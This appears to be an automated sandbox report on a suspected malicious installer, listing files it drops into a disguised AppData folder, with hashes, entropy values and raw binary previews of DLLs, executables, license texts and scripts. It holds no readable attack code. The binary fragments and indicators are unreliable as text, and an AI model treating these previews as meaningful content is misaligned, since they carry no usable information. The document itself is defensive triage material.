Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a..J%..%..%..,......,...>..%......!.....%..0..,......,...$..,...$..,...$..Rich%..................PE..L...<K.V...........!.....L...........u.......`...............................@.....................................0...r...l...x.......0................:.........pb..............................0...@............`..(............................text....J.......L.................. ..`.rdata...V...`...X...P..............@..@.data............t..................@....rsrc...0...........................@..@.reloc..P............"..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ml Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	PDF document, version 1.5
Category:	dropped
Size (bytes):	418532
Entropy (8bit):	7.992704655006582
Encrypted:	true
SSDEEP:	12288:gC3QjgVE/DGk/1gsQR4jflsCEqmnUT9ca7cgTe9b:F3m7zqieCU4NlTO
MD5:	EF946663D3A336BDACB512BF32C8F8F2
SHA1:	1A02B2DEE5CD8815BA977A09505F0B38FEA27665
SHA-256:	0B77203265ADCB18A878383978BCE5C8D6A1D253FE1EFC16B8B161B42F03B79F
SHA-512:	B5E45C3F22F31FD1538C982C83F75DA1015FF56235B26EA1707DCA6B1BC1E41FB11557593CED91D5BF927B985511DBA4047C898A1FE9EB7903932FDBF6C85829
Malicious:	false
Preview:	%PDF-1.5.%.....2 0 obj.<<./Type /ObjStm./N 100./First 806./Length 1140 ./Filter /FlateDecode.>>.stream.x.V]o.8.\|....h..H.E...m.P\q.........d.r..fe.n....%...........y.....KB...4....d.....$..$i....P...I9.Z.R....I..%.c.#.eZ.)\|.%.g...0i.Q.........E...&.^c..8..g.N.Y!..W.r... .A...!,.`...........0.......O`B.$.t8X",x=.)..BHi....<.$.x.Lb..2.....L.`.l)r..M....^.R.k....%.n.....^..'`..,...3.@e....P...5.Z..8&....9..j.g....\|.H..P.....".Y..D.z1)...$.c..2.&,.....B..du.....&.....T.7j%..P-..#P/.9(&5g....W..=..f.x.fc...{".8.,.w)....0.\..(.%..1..&.'`v...(g.....r.K....;.y.....n.....S...+z.>{......l+...r.{...#x.8....n....._..........1^...u..X.....n.7.9.1..c...Kz.....2t.rQ7..L.q.I.2{....'z.....=....]9....p.0.....n.vU?n...P....n"<...9).cu>.}_.I.be>4]7........$iN._t...1..........t..2....nG..o)..E..6.........r...se..=...;].vz...4......y...S...E=. aH..zp.tP... .Hu;u.f..?...)L......U.P.y..1\|..\.MH..=...C.....[]s?......h....g.B9../..l....k..1:wE.S.v.:

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\plcd-player.exe Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3768184
Entropy (8bit):	6.323324235457555
Encrypted:	false
SSDEEP:	49152:mdziNWio/OWFGZ/7pqfwbAFj1IKdn9kvOIBzuJTHPfw8xZcca9KJi4EIdG:sBaNsKKdn9AzBqw8xZcca9KJi4s
MD5:	25DDBD309BB8094229704383977C7268
SHA1:	1574D860469EE784034093199DC9533543E5C096
SHA-256:	8C7E6A620F4BBC343C2695C2E034CC628062B5C2A6B05461FC41B05436F45147
SHA-512:	16CF4205B16F83A3EFEC96660190EFE254919EA18FBC6EB23F45D5C77B0A4A7EFD5DFA36EC1FC43BD79D1D4959A2FA9E172AB842CE7DE754CDC62912752892BA
Malicious:	false
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......N..,..............O.....X..~....X..~....X..~....X..~.......~........e...\..~....\..~....\.#.......K.....\..~....Rich.....`.SH..R.`[RK..RJ.3RK..R.`.SK..RRichJ..R........................PE..L....,oa.............................u............@...........................9.....q.9...@.................................,S1.d.....4..5...........l9.x.....7.............................@.......H...@...............x............................text.............................. ....rdata..B...........................@..@.data....;...p1..(...T1.............@....rsrc....5....4..6...\|4.............@..@.reloc........7.......7.............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ssleay32.dll Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	349720
Entropy (8bit):	6.600820777591867
Encrypted:	false
SSDEEP:	6144:Nv4Nuw10tGJjPZTbGT/yMzU/RSzBnEywGrfG/ySTJ7a7hNl/K5bv3jgNZuDwsLB+:N4Nuw10tGJjPZTbkyMzU/RSzBnHHrf+0
MD5:	F0AED1A32121A577594ECD66980C3ED3
SHA1:	288954A8D6F48639B7605488D2796B14291507E5
SHA-256:	D02CC01A7D9ADC1E6F980D1A56D6A641DF9E2A63FDC5F007264D1BF59ECC1446
SHA-512:	056670F3074AF5A03326C2BE5FFA0FEC23010DDC25BBED07B295EA3F6C7F8DFBC73E40E11E20103EFEB3B230096F630FB0A3CFA61C4E0A74C15A1CB6319D85D9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............r...r...r.......r.......r......r......r...s.4.r....\.r.......r......r......r.Rich..r.................PE..L...<K.V...........!.........l.......).......................................p......................................p...9)......<.... ..0................:...0...,..0...............................x{..@............................................text............................... ..`.rdata..............................@..@.data....[.......@..................@....rsrc...0.... ......................@..@.reloc..b3...0...4..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\decoder.dll Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	207360
Entropy (8bit):	6.451841062476738
Encrypted:	false
SSDEEP:	3072:Xnc8s5yYYVegTR5eO29YoYhNsli0rCckZ9uNDOQH5TmIKO+mAwzvX5Q+M9/:fV79tRUi7ckZSFxPtM9
MD5:	454418EBD68A4E905DC2B9B2E5E1B28C
SHA1:	A54CB6A80D9B95451E2224B6D95DE809C12C9957
SHA-256:	73D5F96A6A30BBD42752BFFC7F20DB61C8422579BF8A53741488BE34B73E1409
SHA-512:	171F85D6F6C44ACC90D80BA4E6220D747E1F4FF4C49A6E8121738E8260F4FCEB01FF2C97172F8A3B20E40E6F6ED29A0397D0C6E5870A9EBFF7B7FB6FAF20C647
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................z.............................r.@.....@.....@.x.........@.....Rich..................PE..L.....Ia.........."!.....X...................p............................................@.........................p...........<....p.. ...............................p........................... ...@............p..t............................text...\V.......X.................. ..`.rdata..\....p.......\..............@..@.data...dV..........................@....rsrc... ....p......................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\AWSSDK.SimpleDB.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	62088
Entropy (8bit):	5.87884188749315
Encrypted:	false
SSDEEP:	1536:0mzFpEBNMGwcQHanzzd2UE/8YVkEyDrKe2xDBoPnp:dFpEBNMGwcsa8f/8a6Pp
MD5:	5AEB79663EA837F8A7A98DC04674B37A
SHA1:	536C24EF0572354E922A8C4A09CF5350D8A6164D
SHA-256:	E13D9F958783595ACD8ACDBFF4D587BCA7E7B6A3AAB796E2EFBD65BD37431536
SHA-512:	25E4E48EC2162EA6342CFD823E789ED0B5A995BB61FA3FA68364D1EE2468974FA4E75C17EB2CB3DDB213E633136C9AAB139BBF32FB8688FF5B1ABF444E8BB652
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tx..........." ..0.................. ........... .......................@.......x....@.................................H...O....... .................... ......x...8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................\|.......H.......$b.............................................................v.~....}.....(.....r...p(.....r...p.r...p..{....Br...p(........."..(....&...(....:..o.....(....:........(....B..........(....&...(......(....F.(....s....( ...b.(....s....%.o!...( ...6.(.....( ...6..s....(....R..s....%.o!...(....&...( ...:...s....(....V...s....%.o!...(........("...>....s....(....^....s....%..o!...(....2......(#....s$..."..(%....0..........(.....(.........(...+..

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\CrashRpt License.txt Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1569
Entropy (8bit):	5.078244393355221
Encrypted:	false
SSDEEP:	48:rlXOOrpJAzJzGl0PE9432sEs32s3IEtd132RTHy:peOrpJAzJzGlBq3b38OSTS
MD5:	734B7CB601EA82D8B4A9926373323B06
SHA1:	37490788B803335FA3AAD761B3EA0010889B2D8D
SHA-256:	90F301E30B61CDF8AC5E29F4FDD0E81C535FCAABF06B48D36B110A3F35E5A3D2
SHA-512:	273F154273DEDF9B06BBA74AEB81BF905309B6F137A414310B1E96C218095CC6B49EE663932815D6771C9BE1D033B014F57E7AE72C7B7FD396A9C254FA124706
Malicious:	false
Preview:	Copyright (c) 2003, The CrashRpt Project Authors...All rights reserved.....Redistribution and use in source and binary forms, with or without modification, ..are permitted provided that the following conditions are met:.... * Redistributions of source code must retain the above copyright notice, this .. list of conditions and the following disclaimer..... * Redistributions in binary form must reproduce the above copyright notice, .. this list of conditions and the following disclaimer in the documentation .. and/or other materials provided with the distribution..... * Neither the name of the author nor the names of its contributors .. may be used to endorse or promote products derived from this software without .. specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY ..EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES ..OF MERCHANTABILITY AND FITNESS

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Delimon.Win32.IO.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	940032
Entropy (8bit):	7.265468453378986
Encrypted:	false
SSDEEP:	12288:SjtToSCODTjAKMmNRYzUubi85LKHtToSCOD7jAK4mNRP:2Vxtqw/85LKHV1pt
MD5:	40C4EA80985E48C095D9F3AF80215C12
SHA1:	B7EAECB4CF5E45F7E3946BCD1C249A46428CA8C0
SHA-256:	2B1678502F69BCCBA816FE2901A12BD15567C4113D8EC5B0C9EBA3A1AEA7C633
SHA-512:	8C1FCFACEBA8273D4307FDC2AF0E8D137CF162838ED0C9AC198D0A29EC0E4E6B8A6B8C202BC415B2353889B4429ED9B07D784F367B2B339F65090242C78D64AA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......P...........!.....N...........l... ........... ..............................{g....@..................................l..S...................................Pk............................................... ............... ..H............text....L... ...N.................. ..`.rsrc................P..............@..@.reloc...............V..............@..B.................l......H.......x...............j...n..P .......................................{.Z.L&.$.......v....lk..AC4..{E.0..X.....?3!...^..Q@..L.{._wSIwnsb].E.D...H=.{.s/.....H.f.q.kn...O.1y.\e.A./.[D.:#..T.h..6...}......}.....s....}.....s....}.....(....J.s....}'....(......0..)........{-........(....t......\|-.....(...+...3.....0..)........{-........(....t......\|-.....(...+...3.....0..)........{.........(....t......\|......(...+...3.*....0..)........{.........(....t......\|......(...+.

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ICSharpCode.SharpZipLib.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	200704
Entropy (8bit):	5.683688089372797
Encrypted:	false
SSDEEP:	3072:hjMibqfQqFyGCDXiW9Pp/+Tl4abpuu201PB1BBXIDwtqSPVINrAfvp1:GibqI59PpOPf201/z7p
MD5:	C8164876B6F66616D68387443621510C
SHA1:	7A9DF9C25D49690B6A3C451607D311A866B131F4
SHA-256:	40B3D590F95191F3E33E5D00E534FA40F823D9B1BB2A9AFE05F139C4E0A3AF8D
SHA-512:	44A6ACCC70C312A16D0E533D3287E380997C5E5D610DBEAA14B2DBB5567F2C41253B895C9817ECD96C85D286795BBE6AB35FD2352FDDD9D191669A2FB0774BC4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.K...........!......... ......^.... ........@.. .......................@............@.....................................K............................ ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\License.txt Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Non-ISO extended-ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	4532
Entropy (8bit):	4.840297093762095
Encrypted:	false
SSDEEP:	96:D9moghaxhFkV9RGGQwGok+iOJ54d7JdEgUVVN7XzUKyeraku:knhIhmz8pJdLk/7XAKy7x
MD5:	54A36434CA791404E0EE1894A7FB257A
SHA1:	E99BA6366C22F9E4693F6317352EAA5854F0F429
SHA-256:	5FCC77BA8A6D6DCA5ECD466F7706133A17571EAAA1B45D4613E2BF5C58DEC678
SHA-512:	87942ABBE3BC1C87BB77323D4E43D63A30ACE3B569FF16363D871B77A306A64569A8655B0B3A526B31F901BA5F081BFE122B7DF7F0C491637DD3050EC948D071
Malicious:	false
Preview:	MyBusinessCatalog Platinum....Copyright: (c)2002-2021 Alexander Chulpanov..Homepage: http://www.MyBusinessCatalog.com..E-mail: info@MyBusinessCatalog.com..==============================================......You should carefully read the following terms and..conditions before using this software.......MyBusinessCatalog is try-before-buy software. This means:....1. All copyrights to MyBusinessCatalog are exclusively owned by the author . Alexander Chulpanov.....2.1 You can use the FREE version of MyBusinessCatalog with restrictions applicable to unregistered version...The DEMO (free) version allows outputs 50 items (to PDF, Printer etc)..Trial periad - 30 days...If a Mobiliger subscription is already active, the trial period for..MyBusinessCatalog Free is automatically extended.....2.2 Registered version...MyBusinessCatalog Platinum - PDF Studio License...Allows creating PDF and Printable catalogs...Small Business License includes 1 (one) year of free software updates.....MyBusin

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Microsoft.Azure.KeyVault.Core.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16968
Entropy (8bit):	6.369067823836705
Encrypted:	false
SSDEEP:	384:YdX0XY0X+DeljFWt6O9QHRN7fhKtklxHQJ:YdXuhvU8ZOJ
MD5:	FEC0A2AB4AB150DAD477E0D4885637CE
SHA1:	5A3C8920DE1B3F2F7867A20D05C94DE5B2779B81
SHA-256:	746760FE317B9721FB761209F0F9F7E1A5126390970AAC5FD93F11504FFE3D30
SHA-512:	11C7C941D31902CCC9F9E07166CF6E181E0ADF7BAEA0986B863CEFD71591431C0D630018B5514C66D6670BFAD1F8ACD363AC19BED486FB92B06DE83A4669C7A0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(..........." ..0.............>.... ...@....... ..............................+.....`..................................-..O....@..................H$...`.......,..T............................................ ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B........................H.......P .. ...................p,......................................BSJB............v4.0.30319......l...(...#~..........#Strings............#US.........#GUID...........#Blob...........G..........3......................................................................b...+.b.....O.........&.l.......................?....\..................................[.............................................<...................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\SslCertBinding.Net.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24200
Entropy (8bit):	6.286319408230414
Encrypted:	false
SSDEEP:	384:PecpB4zReJOVOm9FziUm0exVSiIgm19J8AG4oHHith5kCCeYghu+:3DgeO97m0exVfKwxniQghu+
MD5:	EDCEB39D12707299F6501AE9472A2FD1
SHA1:	F4BE70378AF9FEA7355307CF66E0F5A50590E974
SHA-256:	FA2C262A94F90DAD052A6A5D190F347CD1B8D8BACD7417B8B3FFF56F7D42ECB4
SHA-512:	08406BEDE6C980A1C36EC427C1D86F05F11A41EC366F3821D7B229649B10F3AF9D37AFE7A5A55C7D32D90F0B7D0A43848AF3B20DEA2D2D3669130AAA08729BD2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..U...........!.....:...........X... ...`....... ...............................x....@..................................X..W....`...............B..............\W............................................... ............... ..H............text....8... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............@..............@..B.................X......H.......$-..8..................P ......................................\7..4...tTh......A_RF...+X.P.k........_.'....R\|RY.r..d.(...._..h4....sN.:..QU.e...RY..%........(.Y.Kf6.7.w...T..(;._\|n....{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......(......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}....*

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\System.Threading.Tasks.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	35016
Entropy (8bit):	6.54246973766738
Encrypted:	false
SSDEEP:	384:WL0xHprBefGMOrRQY+hoZhOZkcvr3Eql38WqATrOhEZ0GftpBj1x+ILKHRN7c6lE:NRBefGBkoWjvr0VabKirxmcM+
MD5:	85F6F590B5C4B8C7253E9C403C9BE607
SHA1:	D5A9DB942A50C8821BACD7F6030202C57EC4708B
SHA-256:	D20552FD5C8C8C9759608A84DB1E216DA738F5E9F46DE9E8A3F39A0D6265CB8B
SHA-512:	9C78CB444E28618D44E9DEB23571FC7BBCE268882C2803E0CCC0E84B3E6EAB89C6AF2AAC0D81EF0D2C9FD1E9611CB35334EF3304FB16C5BA0481F6A7273C3660
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.T...........!.....@..........._... ...`....... ....................................`.................................\_..O....`...............J...>..........$^............................................... ............... ..H............text....?... ...@.................. ..`.rsrc........`.......B..............@..@.reloc...............H..............@..B................._......H.......h..../..................P .......................................#..ON.... "J.0..r....6RbR[..44....F.....E.X....1.XIE...:....5.M...Txn.\rycn.....o\|.V}...l}.1En...`.T. \(e .u..=.nA...@p:.(......}....R..r...p.(.....(...+N..r...p.(....(...+R..r...p.(.....(...+Z...r...p.(......(...+Z...r...p.(......(...+..0..$...........(...+..-...........o...........0..............(...+..-.s....z.o.......0..............(...+..-.s....z.o.......0..............(...+..-..*.

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Templates\currencysystem4.js Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	18727
Entropy (8bit):	5.228912164616093
Encrypted:	false
SSDEEP:	384:vADBz8NWcg8Yt0Mp9sXYGb0JPMfBH1FBIpz4vl:vADBz8NWcg8Y2Mp9sXlb0OfBH1F+pz4t
MD5:	E001FBA3F73ADB83B5B9DCD2A32F1C7B
SHA1:	D0B3A5615F30226072BA90A961DBAD1CE0ED23E2
SHA-256:	60A987CFE5AE817D5D5ED82E1F39C3C537321EE9AB9A0B902DB2990F66B99887
SHA-512:	6DF77E4AC29B0AF120C2EE9380BACD4D1E02C08E9F6E7CD293959F7438294182B773B3C75E0DED111C3EEFD511B09FDF2F43927D68884572F745464705EE81A9
Malicious:	false
Preview:	/...Copyright (C) 1998-2009 Currency System, Inc. All rights reserved....$VER: Currency System Script Library 4.6../....// Currency object constructor..//..function Currency(code, nameS, nameST, symbol, rateEUR, smallestUnit, regime, physical, legalTender, popularity)..{...this.code = code;...this.nameS = nameS; // singular...this.nameST = nameST; // singular titlestyle...this.symbol = symbol;...this.rateEUR = rateEUR;...this.smallestUnit = smallestUnit;...this.regime = regime;...this.physical = physical;...this.legalTender = legalTender;...this.popularity = popularity;..}....// CurrencySystem object constructor..//..function CurrencySystem()..{...this.version = "4.6";...this.initialized = 0;...//...this.initialize = currencySystem_initialize; // object.method=function(){} syntax not supported in Netscape Navigator 3...this.converterCodeExists = currencySystem_converterCodeExists;...this.converterCodeIsUsed = currencySystem_converterCodeIsUsed;...this.converterUnusedCode = currenc

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Templates\currencysystem5.js Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	18850
Entropy (8bit):	5.252718939622608
Encrypted:	false
SSDEEP:	192:LVJMqzg8F9zp/OQMhEF7IXs1NmrgfTPzD5bL29h1FDiTYyf1CQx/TuTmkk6aez4U:LV2Ig8FanXcmrgfTlwOH1ltsz4v8
MD5:	866B6E8A186BE6005A140CFE9F578CD8
SHA1:	E0B2E5344097EF4C1C0A8BE851C5DE27C7F490DB
SHA-256:	0A5731729919FEDC1A3B81C651087AB200C9470FA75A89BEBEA73AE0478F30E5
SHA-512:	BE84B6A9B893DC0D66113287942A388BAFB0629AE67E6C02A8E09E98A028D50CCFA082A2C1B5BFAFA273ACF9E6338E961FA208B62EF6BEE43D8BFD5E6D4619A9
Malicious:	false
Preview:	/...Copyright (C) 1998-2012 Currency System, Inc. All rights reserved....$VER: Currency System Script Library 5.2../....// Currency object constructor..//..function Currency(code, nameS, nameST, symbol, rateEUR, smallestUnit, regime, physical, legalTender, popularity)..{...this.code = code;...this.nameS = nameS; // singular...this.nameST = nameST; // singular titlestyle...this.symbol = symbol;...this.rateEUR = rateEUR;...this.smallestUnit = smallestUnit;...this.regime = regime;...this.physical = physical;...this.legalTender = legalTender;...this.popularity = popularity;..}....// CurrencySystem object constructor..//..function CurrencySystem()..{...this.version = "5.1";...this.initialized = 0;...//...this.initialize = currencySystem_initialize; // object.method=function(){} syntax not supported in Netscape Navigator 3...this.widgetCurrencyIsListed = currencySystem_widgetCurrencyIsListed;...this.widgetCurrencyIsUsed = currencySystem_widgetCurrencyIsUsed;...this.widgetSuggestUnusedCu

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Templates\currencysystem5.json Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	635
Entropy (8bit):	4.968896753287593
Encrypted:	false
SSDEEP:	12:G3in27KkdcynYKFfaYKQItIl7eTaYKRHTaYKQItI9txrZOaYKB3i8T:G3i27KkdvYKtaYK3qteTaYKRHTaYK3qz
MD5:	D5BE63A1E66E4D6597F49BFD15EB3D83
SHA1:	6B0D0E3101EDB0C92C14691745765DE49CDB7C01
SHA-256:	A1CF701C876F916AACB12A3B952D1D2A38889C2AC118AF9D89493F0A86A45C5D
SHA-512:	6F8CD8F4D18D978F9B30E00322E3CC020B1C3ADD6B6307ED96EBB47B422DD15DDE4BB82698AE755CEF57F8BA3B1BDBD6F47D83CF08471E7B131B8CF8B20ACA55
Malicious:	false
Preview:	{...<currencysystem-insert-header>....."embedLicense": "This service is free to use as long as the banner and link appear on all pages using it. See the Attribution information at currencysystem.com.",..."embedSmallBannerGfx": "https://currencysystem.com/gfx/pub/script-button-88x31.png",..."embedSmallBannerText": "Powered by Currrency System",..."embedSmallBannerLink": "https://currencysystem.com",....."embedSmallHomeGfx": "https://currencysystem.com/gfx/pub/script-icon-16x16.png",..."embedSmallHomeText": "Currrency System Homepage",..."embedSmallHomeLink": "https://currencysystem.com",.....<currencysystem-insert-currencies>..}

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Templates\ecb-eurofxref-daily.xml Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	403
Entropy (8bit):	5.022779704233175
Encrypted:	false
SSDEEP:	6:TMVBd/5Q3JLHAc4Mj/9mc4C7drcDqhsDgLHLvvssw92PXCEZqilvs/BRi8LqfaR/:TMHduFHjFbdrcDWPu2XCMei8Lqai8L/
MD5:	376F44C2269588374F0F7E876BB3CFFA
SHA1:	1241AC750F7CA447D7A74EB516838C39516AA841
SHA-256:	3B96E197B1A47E7A391385638E13A0CF42E04E1665470A89EABECC67D1B91323
SHA-512:	744C894429453B5E40241FEA6A2EBD354BF2B06C5AD9B4439BE1CCACD15B89C487A1FE100851F23E7A2212CCAC600FC8519224855D7AC72F09E6AABD1E8AC6C9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<gesmes:Envelope xmlns:gesmes="http://www.gesmes.org/xml/2002-08-01" xmlns="http://www.ecb.int/vocabulary/2002-08-01/eurofxref">..<gesmes:subject>Reference rates</gesmes:subject>..<gesmes:Sender>...<gesmes:name>European Central Bank</gesmes:name>..</gesmes:Sender>..<Cube>... currencysystem-insert-->... /currencysystem-insert-->..</Cube>.</gesmes:Envelope>.

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\help.chm Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	MS Windows HtmlHelp Data
Category:	dropped
Size (bytes):	325845
Entropy (8bit):	7.966997729785747
Encrypted:	false
SSDEEP:	6144:upVysoxdLmULS5Nv5czGT6ozCF6DWc4kYBDrHDDoicYs0meNdts:iAsWJmUSjBczf3c4dHDDoicYs0re
MD5:	DF113262CBB4AD90D0D889620BDEFB06
SHA1:	D94D2111F9FD566941FF96DBA6237D126591E512
SHA-256:	195BAFB549728E15B392B5A2FCBD41003D2472B1AD82AED449175C37E5834657
SHA-512:	B3DDFCCEFFDE24791DFB9587D5AEBC406B9EC3408B38D50C70AC324931C37FD7F55099C7F84B8359A76ACA1BB0E350977451639CC0E61241EBE16D6F4DB90976
Malicious:	false
Preview:	ITSF....`..........g.......\|.{.......".....\|.{......."..`...............x.......T.......................................ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...5.../#ITBITS..../#IVB...Rd./#STRINGS...U.i./#SYSTEM....;./#TOPICS...5.p./#URLSTR...Y.\|./#URLTBL...%.4./#WINDOWS.....L./$FIftiMain...}..8./$OBJINST...>.?./$WWAssociativeLinks/..../$WWAssociativeLinks/Property...:../$WWKeywordLinks/..../$WWKeywordLinks/Property...6. /about-how-create-a-catalog.html..{.z!/catalog-makers-context-menu.html..u.62/cd-catalog-creator-first-lanche-informations.html..+.[+/checkboxes-options-in-catalog-builder.html...x.../checkboxes_html_117d54ec.png...h.../checkboxes_html_m548d6b7e.png...m.X./checkboxes_html_m59955fe6.png..._.../checkboxes_html_m678cf8a3.png...E.2 /context_menu_html_m6108afb8.png...S.n,/create-order-from-enduser-cd-catalogue.html..A..,/create_a_catalog_related_products_user.html...x.~./how-use-cd-catalog.html

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\icuio58.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54224
Entropy (8bit):	6.686697566242328
Encrypted:	false
SSDEEP:	1536:8n6iCEsBHqIXN0llUofqcOZkE5z7L/cLlvBQ+8iAYS:GuEsdXL/cLlGD1
MD5:	249D164D4361F1BBF827331A2C5B8E64
SHA1:	225AE2D2E277B817962D3A65666706BDF7AE6067
SHA-256:	492ADEB85D95834A97FC2C1BD61347202111A3773CE4DE35FC1597C52BE7AAB3
SHA-512:	16B656E17A305503A01C7429EC44DC9DED0DEC39F50844F5CAFF2484AF3F3551F11B620C63111361A5D333AA16A7DB0A2DC7FF5C895AA6C9252F21CA42223A17
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......H.....s_..s_..s_..._..s_F.p^..s_F.v^..s_F.w^..s_F.r^..s_..r^..s_.i._..s_..r_a.s_..w^..s_..v^..s_..s^..s_..._..s_..._..s_..q^..s_Rich..s_........PE..L......Z...........!.....r...6.......r.............J................................"...................................................8................)..............T...............................@............................................text....p.......r.................. ..`.rdata...".......$...v..............@..@.data...............................@....rsrc...8...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\lcms-5.0.dll Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4993536
Entropy (8bit):	6.871255823719978
Encrypted:	false
SSDEEP:	98304:vdG+iN2k+e/VO+0X30DQHDbOXh9A0DESaHafv4UZDCr:A+Hk+eX0BHDbOXh9A0DeHfUZDS
MD5:	B6723B31F67956E747493BC64F2C7A59
SHA1:	72389ECF849BFDA364E84258E5857A3DF07E5BFC
SHA-256:	3361AC8727ABA86AC7F3AAC3A214C3CB76F1AF9FF7EE5E94C52C30FDCB7D5064
SHA-512:	E17FEA164BB00E65BE0E58771A728FC9CED5BD65AE2FEC9E55C5697E69A498404B6D52B529DF774012C9F1268D29D97AD3CAFD404BAD58B3C36535A52AB6E09B
Malicious:	false
